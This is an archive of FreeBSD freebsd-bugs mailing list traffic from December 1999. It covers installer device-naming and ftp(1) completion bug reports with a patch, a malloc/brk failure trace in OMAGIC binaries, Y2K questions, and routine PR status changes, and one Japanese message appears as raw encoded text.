hub.freebsd.org (Postfix) with ESMTP id EEC1614DBA for ; Sun, 19 Dec 1999 08:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA60242; Sun, 19 Dec 1999 08:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 499EC150D9; Sun, 19 Dec 1999 08:37:07 -0800 (PST) Message-Id: <19991219163707.499EC150D9@hub.freebsd.org> Date: Sun, 19 Dec 1999 08:37:07 -0800 (PST) From: bero@redhat.de To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: misc/15571: Installer doesn't know about wd* -> ad* change Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15571 >Category: misc >Synopsis: Installer doesn't know about wd* -> ad* change >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Dec 19 08:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Bernhard Rosenkraenzer >Release: 4.0-CURRENT-19991218 >Organization: Red Hat >Environment: n/a >Description: The installer apparently hasn't been updated to know about the new ad* devices. Trying to install 4.0-19991218 stops at filesystem generation: Unable to make device node for /dev/ad1s1b in /dev The creation of file systems will be aborted. >How-To-Repeat: Try to install 4.0-CURRENT-19991218 >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 9:16: 1 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D1F98150F9; Sun, 19 Dec 1999 09:15:59 -0800 (PST) (envelope-from bde@FreeBSD.org) Received: (from bde@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id JAA62062; Sun, 19 Dec 1999 09:15:59 -0800 (PST) (envelope-from bde@FreeBSD.org) Date: Sun, 19 Dec 1999 09:15:59 -0800 (PST) From: Message-Id: <199912191715.JAA62062@freefall.freebsd.org> To: jjr@alisa.org, bde@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/15451: FreeBSD 3.2 system panics with Cyclades 8yep card installed & driver enabled Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: FreeBSD 3.2 system panics with Cyclades 8yep card installed & driver enabled State-Changed-From-To: open->closed State-Changed-By: bde State-Changed-When: Sun Dec 19 09:13:36 PST 1999 State-Changed-Why: The originator reported in other mail that the problem only occurs when SMP is configured. The fix is to upgrade to FreeBSD-3.3 or a later version. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 10:39:38 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 81E1814C7F; Sun, 19 Dec 1999 10:39:37 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA66895; Sun, 19 Dec 1999 10:39:37 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Sun, 19 Dec 1999 10:39:37 -0800 (PST) From: Message-Id: <199912191839.KAA66895@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, jkh@FreeBSD.org Subject: Re: misc/15571: Installer doesn't know about wd* -> ad* change Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Installer doesn't know about wd* -> ad* change Responsible-Changed-From-To: freebsd-bugs->jkh Responsible-Changed-By: phantom Responsible-Changed-When: Sun Dec 19 10:38:38 PST 1999 Responsible-Changed-Why: Over to Mr. Sysinstall To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 10:40:26 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 675FE150F9; Sun, 19 Dec 1999 10:40:24 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA67016; Sun, 19 Dec 1999 10:40:24 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Sun, 19 Dec 1999 10:40:24 -0800 (PST) From: Message-Id: <199912191840.KAA67016@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: misc/15565: x11-toolkits/rep-gtk updated Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: x11-toolkits/rep-gtk updated Responsible-Changed-From-To: freebsd-bugs->freebsd-ports Responsible-Changed-By: phantom Responsible-Changed-When: Sun Dec 19 10:39:55 PST 1999 Responsible-Changed-Why: Misfiled PR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 10:56:50 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id BBDA5151CF; Sun, 19 Dec 1999 10:56:48 -0800 (PST) (envelope-from phantom@FreeBSD.org) Received: (from phantom@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id KAA67975; Sun, 19 Dec 1999 10:56:47 -0800 (PST) (envelope-from phantom@FreeBSD.org) Date: Sun, 19 Dec 1999 10:56:47 -0800 (PST) From: Message-Id: <199912191856.KAA67975@freefall.freebsd.org> To: phantom@FreeBSD.org, freebsd-bugs@FreeBSD.org, freebsd-doc@FreeBSD.org Subject: Re: bin/15561: regex(3) manpage needs update Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: regex(3) manpage needs update Responsible-Changed-From-To: freebsd-bugs->freebsd-doc Responsible-Changed-By: phantom Responsible-Changed-When: Sun Dec 19 10:56:29 PST 1999 Responsible-Changed-Why: Misfiled PR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 12:22: 8 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id E0DD9151A6 for ; Sun, 19 Dec 1999 12:22:06 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id PAA65483; Sun, 19 Dec 1999 15:22:04 -0500 (EST) (envelope-from wollman) Date: Sun, 19 Dec 1999 15:22:04 -0500 (EST) From: Garrett Wollman Message-Id: <199912192022.PAA65483@khavrinen.lcs.mit.edu> To: Poul-Henning Kamp Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/15554: malloc fails in OMAGIC programs In-Reply-To: <199912191250.EAA93066@freefall.freebsd.org> References: <199912191250.EAA93066@freefall.freebsd.org> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > I thought programs started out at 0x0 or at least close to zero ? Not ELF programs. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 14:37:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (Postfix) with ESMTP id 3E92114EBD for ; Sun, 19 Dec 1999 14:37:36 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.3/8.9.2) with ESMTP id XAA07708; Sun, 19 Dec 1999 23:37:14 +0100 (CET) (envelope-from phk@critter.freebsd.dk) To: Garrett Wollman Cc: freebsd-bugs@FreeBSD.ORG Subject: Re: kern/15554: malloc fails in OMAGIC programs In-reply-to: Your message of "Sun, 19 Dec 1999 15:22:04 EST." <199912192022.PAA65483@khavrinen.lcs.mit.edu> Date: Sun, 19 Dec 1999 23:37:13 +0100 Message-ID: <7706.945643033@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199912192022.PAA65483@khavrinen.lcs.mit.edu>, Garrett Wollman write s: >< said: > >> I thought programs started out at 0x0 or at least close to zero ? > >Not ELF programs. I know, but I thought we tried to keep the start low still. Anyway, the problem is obviously sbrk(2)/brk(2) failing: syv# cat a.c #include #include #include #include #include int main (int argc, char **argv) { char *p = malloc (8192); char buf[4096]; int fd, i; fd = open("/proc/curproc/map", O_RDONLY); if (fd >= 0) { do { i = read(fd, buf, sizeof buf); if (i > 0) write(1, buf, i); } while (i > 0); close(fd); } if (!p) { char badmalloc[] = "malloc failed\n"; write (2, badmalloc, sizeof (badmalloc)); write (2, strerror (errno), strlen (strerror (errno))); write (2, "\n", 1); exit (1); } exit (0); } syv# cc -static -N -o a a.c syv# ktrace ./a 0x8048000 0x804a000 2 0 0xcdc0f180 rwx 1 0 0x0 COW NC vnode 0x804a000 0x804b000 1 0 0xc0279fe0 rwx 1 0 0x2180 NCOW NNC default 0x20000000 0x20001000 1 0 0xcdc324e0 rwx 1 0 0x2180 NCOW NNC default 0xbfbe0000 0xbfc00000 2 0 0xcdc60de0 rwx 1 0 0x2180 NCOW NNC default malloc failed Cannot allocate memory syv# kdump 3101 ktrace RET ktrace 0 3101 ktrace CALL execve(0xbfbffd6f,0xbfbffcb0,0xbfbffcb8) 3101 ktrace NAMI "./a" 3101 a RET execve 0 3101 a CALL readlink(0x804a7d4,0xbfbfeba4,0x3f) 3101 a NAMI "/etc/malloc.conf" 3101 a RET readlink -1 errno 2 No such file or directory 3101 a CALL mmap(0,0x1000,0x3,0x1002,0xffffffff,0,0,0) 3101 a RET mmap 536870912/0x20000000 3101 a CALL break(0x804c000) 3101 a RET break -1 errno 12 Cannot allocate memory 3101 a CALL break(0x804d000) 3101 a RET break -1 errno 12 Cannot allocate memory 3101 a CALL open(0x8049d01,0,0) 3101 a NAMI "/proc/curproc/map" 3101 a RET open 3 3101 a CALL read(0x3,0xbfbfec60,0x1000) 3101 a GIO fd 3 read 265 bytes "0x8048000 0x804a000 2 0 0xcdc0f180 rwx 1 0 0x0 COW NC vnode 0x804a000 0x804b000 1 0 0xc0279fe0 rwx 1 0 0x2180 NCOW NNC default 0x20000000 0x20001000 1 0 0xcdc324e0 rwx 1 0 0x2180 NCOW NNC default 0xbfbe0000 0xbfc00000 2 0 0xcdc60de0 rwx 1 0 0x2180 NCOW NNC default " 3101 a RET read 265/0x109 3101 a CALL write(0x1,0xbfbfec60,0x109) 3101 a GIO fd 1 wrote 265 bytes "0x8048000 0x804a000 2 0 0xcdc0f180 rwx 1 0 0x0 COW NC vnode 0x804a000 0x804b000 1 0 0xc0279fe0 rwx 1 0 0x2180 NCOW NNC default 0x20000000 0x20001000 1 0 0xcdc324e0 rwx 1 0 0x2180 NCOW NNC default 0xbfbe0000 0xbfc00000 2 0 0xcdc60de0 rwx 1 0 0x2180 NCOW NNC default " 3101 a RET write 265/0x109 3101 a CALL read(0x3,0xbfbfec60,0x1000) 3101 a GIO fd 3 read 0 bytes "" 3101 a RET read 0 3101 a CALL close(0x3) 3101 a RET close 0 3101 a CALL write(0x2,0xbfbfec48,0xf) 3101 a GIO fd 2 wrote 15 bytes "malloc failed \0" 3101 a RET write 15/0xf 3101 a CALL write(0x2,0x804a680,0x16) 3101 a GIO fd 2 wrote 22 bytes "Cannot allocate memory" 3101 a RET write 22/0x16 3101 a CALL write(0x2,0x8049d22,0x1) 3101 a GIO fd 2 wrote 1 byte " " 3101 a RET write 1 3101 a CALL exit(0x1) -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 18: 0: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 406321527E for ; Sun, 19 Dec 1999 18:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA98357; Sun, 19 Dec 1999 18:00:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Sun, 19 Dec 1999 18:00:02 -0800 (PST) Message-Id: <199912200200.SAA98357@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Jean-Marc Zucconi Subject: Re: misc/15555: some enhancements for uudecode Reply-To: Jean-Marc Zucconi Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/15555; it has been noted by GNATS. From: Jean-Marc Zucconi To: ca+freebsd@zardoc.endmail.org Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: misc/15555: some enhancements for uudecode Date: Mon, 20 Dec 1999 02:50:38 +0100 (MET) >>>>> freebsd writes: >> Description: > uudecode isn't very helpful in it's error reports: > It doesn't mention the source file if a destination file > is to be overridden, nor does it mention the line where > an out-of-range characters occurs. But your patch does not print the exact line number in the file, only an offset from the 'begin' line. It does not help very much when the input file contains several uuencoded files. Jean-Marc -- Jean-Marc Zucconi PGP Key: finger jmz@FreeBSD.ORG To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sun Dec 19 23:27:19 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from soda2.bekkoame.ne.jp (soda2.bekkoame.ne.jp [202.231.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 6F54414D73 for ; Sun, 19 Dec 1999 23:27:16 -0800 (PST) (envelope-from pero@ha.bekkoame.ne.jp) Received: from ha.bekkoame.ne.jp (a022012.ap.plala.or.jp [210.153.22.12]) by soda2.bekkoame.ne.jp (8.9.2/3.7W) with ESMTP id QAA00329 for ; Mon, 20 Dec 1999 16:32:48 +0900 (JST) Message-ID: <385DDA8B.A72A9776@ha.bekkoame.ne.jp> Date: Mon, 20 Dec 1999 16:28:11 +0900 From: Takahiro Saitou X-Mailer: Mozilla 4.5 (Macintosh; I; PPC) X-Accept-Language: ja MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.ORG Subject: Dear.linux.org.co.lic. Content-Type: text/plain; charset=iso-2022-jp; x-mac-type="54455854"; x-mac-creator="4D4F5353" Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org How to take free ppp ver.2.6.2 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 1:47:17 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from rc29090.rc.kyushu-u.ac.jp (rc29090.rc.kyushu-u.ac.jp [133.5.29.90]) by hub.freebsd.org (Postfix) with ESMTP id A3EEC14E7C for ; Mon, 20 Dec 1999 01:46:29 -0800 (PST) (envelope-from kuro@rc29090.rc.kyushu-u.ac.jp) Received: (from kuro@localhost) by rc29090.rc.kyushu-u.ac.jp (8.8.5/8.8.5) id SAA04124; Mon, 20 Dec 1999 18:30:12 +0900 (JST) Date: Mon, 20 Dec 1999 18:30:12 +0900 (JST) From: Kuromizu Reiko Message-Id: <199912200930.SAA04124@rc29090.rc.kyushu-u.ac.jp> To: freebsd-bugs@FreeBSD.ORG Subject: About the year 2000 bug of FreeBSD 2.2.2-RELEASE Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Japan FreeBSD User's Group $BMM(B $B$O$8$a$^$7$F!#(B $B;d$O6e=#Bg3X(B $BM}3X8&5f2J$N9u?eNh;R$H$$$$$^$9!#(B $B$3$NEY$O!V(BFreeBSD 2.2.2-RELEASE$B!W$,(B2000$BG/LdBj$KBP1~$7$F$$$k$+$I$&$+(B $B$*J9$-$7$?$/!"%a!<%k$rAw$i$;$F$$$?$@$-$^$7$?!#(B $B$=$A$i$N%[!<%`%Z!<%8$r;29M$K$5$;$F$$$?$@$$$F(B $BBg>fIW$J$N$G$O$J$$$+$H$O;W$&$N$G$9$,!"(B $B$O$C$-$j$H3N?.$,;}$F$^$;$s!#(B $B$h$m$7$1$l$P!V(BFreeBSD 2.2.2-RELEASE$B!W$,(B2000$BG/LdBj$KBP1~$7$F$$$k$+$I$&$+(B $B$*J9$+$;2<$5$$!#$b$7$/$O!"$=$N$3$H$K4X$9$k%[!<%`%Z!<%8Ey$r(B $B65$($F$/$@$5$l$P9,$$$G$9!#(B $BMQ7o$N$_$G$9$,!"$3$l$G<:Ni$5$;$F$$$?$@$-$^$9!#(B $B9u?e(B $BNh;R!J(BReiko Kuromizu$B!K(B $B6e=#Bg3X(B $BM}3X8&5f2J(B $B4pACN3;R7O2J3X@l96(B $B=$;N(B1$BG/(B e-mail kuromizu@gemini.rc.kyushu-u.ac.jp To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 1:50:13 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from mx1.itb.ac.id (mx1.itb.ac.id [202.249.47.36]) by hub.freebsd.org (Postfix) with SMTP id 676CC15171 for ; Mon, 20 Dec 1999 01:49:43 -0800 (PST) (envelope-from basuki@itb.edu) Received: (qmail 21987 invoked from network); 20 Dec 1999 09:49:04 -0000 Received: from unknown (HELO itb.edu) (167.205.22.126) by mx1.itb.ac.id with SMTP; 20 Dec 1999 09:49:04 -0000 Message-ID: <385DD77F.E3C88FE@itb.edu> Date: Mon, 20 Dec 1999 14:15:13 +0700 From: basuki X-Mailer: Mozilla 4.5 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-bugs@FreeBSD.ORG Subject: tacacs on Frebsd 2.2.1 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dear Sir , we have tacacs server running on Freebsd 2.2.1 is this product Y2K compliant ? thnx -bas- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 2: 8:59 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from probity.mcc.ac.uk (probity.mcc.ac.uk [130.88.200.94]) by hub.freebsd.org (Postfix) with ESMTP id B940E1518B for ; Mon, 20 Dec 1999 02:08:56 -0800 (PST) (envelope-from lmw@nessie.mcc.ac.uk) Received: from nessie.mcc.ac.uk ([130.88.200.20] ident=lmw) by probity.mcc.ac.uk with esmtp (Exim 1.92 #3) for freebsd-bugs@freebsd.org id 11zzkN-000DCu-00; Mon, 20 Dec 1999 10:08:55 +0000 Received: (from lmw@localhost) by nessie.mcc.ac.uk (8.8.8/8.8.8) id KAA12446 for freebsd-bugs@freebsd.org; Mon, 20 Dec 1999 10:08:50 GMT (envelope-from lmw) From: Linda Ward Message-Id: <199912201008.KAA12446@nessie.mcc.ac.uk> Subject: Elm 2.4 Y2K bugs To: freebsd-bugs@freebsd.org Date: Mon, 20 Dec 1999 10:08:50 +0000 (GMT) Reply-To: Linda.Ward@mcc.ac.uk Comments: Postmistress@mcc.ac.uk X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, Can you please tell me what the specific Y2K issues are with Elm 2.4 TIA, Linda. -- email:- Postmistress@mcc.ac.uk phone:- +44 (0)161-275-6004 fax:- +44 (0)161-275-6040 Network & Operations Group, Manchester Computing, The University, M13 9PL. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 2:10: 9 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4F1411523C for ; Mon, 20 Dec 1999 02:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA35705; Mon, 20 Dec 1999 02:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 65387152AB; Mon, 20 Dec 1999 02:07:30 -0800 (PST) Message-Id: <19991220100730.65387152AB@hub.freebsd.org> Date: Mon, 20 Dec 1999 02:07:30 -0800 (PST) From: Joel.Faedi@esial.u-nancy.fr To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/15580: ftp(1) file completion does not work if server is wu-ftpd 2.6.0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15580 >Category: bin >Synopsis: ftp(1) file completion does not work if server is wu-ftpd 2.6.0 >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 02:10:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Joël Faedi >Release: 3.3-RELEASE and -current >Organization: ESIAL >Environment: FreeBSD meduse.scinfo.u-nancy.fr 3.3-RELEASE FreeBSD 3.3-RELEASE #1: Sat Oct 9 17:59:09 CEST 1999 faedi@meduse.faedi.fr:/usr/src/sys/compile/MEDUSE i386 >Description: ftp(1) file completion does not work if server is wu-ftpd 2.6.0. This is due to nlist (NLST) change in wu-ftpd 2.6.0. You can see also docs/15408 (ls = dir != nlist). >How-To-Repeat: % ftp -d current.freebsd.org Connected to usw2.freebsd.org. 220 usw2.freebsd.org FTP server (Version wu-2.6.0(1) Tue Dec 7 17:24:13 CST 1999) ready. ---> USER anonymous 331 Guest login ok, send your complete e-mail address as password. ---> PASS XXXX 230 Guest login ok, access restrictions apply. ---> SYST 215 UNIX Type: L8 Version: BSD-199506 Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /p <<<<<<< TAB key pressed avec letter "p" ---> PORT 192,33,169,41,192,23 ---> NLST / 550 No files found. ftp> nlist / ---> PORT 192,33,169,41,192,24 200 PORT command successful. ---> NLST / 550 No files found. ftp> nlist "-a /" ---> PORT 192,33,169,41,192,25 200 PORT command successful. ---> NLST -a / 150 Opening ASCII mode data connection for /bin/ls. . .. bin etc incoming pub usr 226 Transfer complete. ftp> bye ---> QUIT 221-You have transferred 0 bytes in 0 files. 221-Total traffic for this session was 683 bytes in 1 transfers. 221-Thank you for using the FTP service on usw2.freebsd.org. 221 Goodbye. >Fix: When doing remote globing do a NLST "-a xxxx" (file util.c). Here is a patch obtained with "diff -c util.c.old util.c > util.c.patch" from -current ftp/util.c ($FreeBSD: src/usr.bin/ftp/util.c,v 1.8 1999/08/28 01:01:35 peter Exp) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 2:10:12 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 475CB152B9 for ; Mon, 20 Dec 1999 02:10:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA35714; Mon, 20 Dec 1999 02:10:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 2E370152AB; Mon, 20 Dec 1999 02:07:47 -0800 (PST) Message-Id: <19991220100747.2E370152AB@hub.freebsd.org> Date: Mon, 20 Dec 1999 02:07:47 -0800 (PST) From: Joel.Faedi@esial.u-nancy.fr To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: bin/15581: ftp(1) file completion does not work if server is wu-ftpd 2.6.0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15581 >Category: bin >Synopsis: ftp(1) file completion does not work if server is wu-ftpd 2.6.0 >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Dec 20 02:10:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: Joël Faedi >Release: 3.3-RELEASE and -current >Organization: ESIAL >Environment: FreeBSD meduse.scinfo.u-nancy.fr 3.3-RELEASE FreeBSD 3.3-RELEASE #1: Sat Oct 9 17:59:09 CEST 1999 faedi@meduse.faedi.fr:/usr/src/sys/compile/MEDUSE i386 >Description: ftp(1) file completion does not work if server is wu-ftpd 2.6.0. This is due to nlist (NLST) change in wu-ftpd 2.6.0. You can see also docs/15408 (ls = dir != nlist). >How-To-Repeat: % ftp -d current.freebsd.org Connected to usw2.freebsd.org. 220 usw2.freebsd.org FTP server (Version wu-2.6.0(1) Tue Dec 7 17:24:13 CST 1999) ready. ---> USER anonymous 331 Guest login ok, send your complete e-mail address as password. ---> PASS XXXX 230 Guest login ok, access restrictions apply. ---> SYST 215 UNIX Type: L8 Version: BSD-199506 Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /p <<<<<<< TAB key pressed avec letter "p" ---> PORT 192,33,169,41,192,23 ---> NLST / 550 No files found. ftp> nlist / ---> PORT 192,33,169,41,192,24 200 PORT command successful. ---> NLST / 550 No files found. ftp> nlist "-a /" ---> PORT 192,33,169,41,192,25 200 PORT command successful. ---> NLST -a / 150 Opening ASCII mode data connection for /bin/ls. . .. bin etc incoming pub usr 226 Transfer complete. ftp> bye ---> QUIT 221-You have transferred 0 bytes in 0 files. 221-Total traffic for this session was 683 bytes in 1 transfers. 221-Thank you for using the FTP service on usw2.freebsd.org. 221 Goodbye. >Fix: When doing remote globing do a NLST "-a xxxx" (file util.c). Here is a patch obtained with "diff -c util.c.old util.c > util.c.patch" from -current ftp/util.c ($FreeBSD: src/usr.bin/ftp/util.c,v 1.8 1999/08/28 01:01:35 peter Exp) *** util.c.old Mon Dec 20 11:04:15 1999 --- util.c Mon Dec 20 10:36:41 1999 *************** *** 378,385 **** hash = 0; if (doswitch) pswitch(!proxy); ! for (mode = "w"; *++argv != NULL; mode = "a") ! recvrequest("NLST", temp, *argv, mode, 0, 0); if ((code / 100) != COMPLETE) { if (errbuf != NULL) *errbuf = reply_string; --- 378,394 ---- hash = 0; if (doswitch) pswitch(!proxy); ! for (mode = "w"; *++argv != NULL; mode = "a") { ! char *nlst_argv; ! ! if ((nlst_argv = malloc(strlen(*argv) + 4)) == NULL) { ! warn("unable to allocate memory for remote globing"); ! return (NULL); ! } ! (void)sprintf(nlst_argv, "-a %s", *argv); ! recvrequest("NLST", temp, nlst_argv, mode, 0, 0); ! free(nlst_argv); ! } if ((code / 100) != COMPLETE) { if (errbuf != NULL) *errbuf = reply_string; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 2:17: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6FB45152EF; Mon, 20 Dec 1999 02:17:03 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Received: (from cpiazza@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA36406; Mon, 20 Dec 1999 02:17:02 -0800 (PST) (envelope-from cpiazza@FreeBSD.org) Date: Mon, 20 Dec 1999 02:17:02 -0800 (PST) From: Message-Id: <199912201017.CAA36406@freefall.freebsd.org> To: Joel.Faedi@esial.u-nancy.fr, cpiazza@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/15581: ftp(1) file completion does not work if server is wu-ftpd 2.6.0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ftp(1) file completion does not work if server is wu-ftpd 2.6.0 State-Changed-From-To: open->closed State-Changed-By: cpiazza State-Changed-When: Mon Dec 20 02:16:49 PST 1999 State-Changed-Why: Duplicate of PR bin/15580 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 4:13:38 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 457B214E5A; Mon, 20 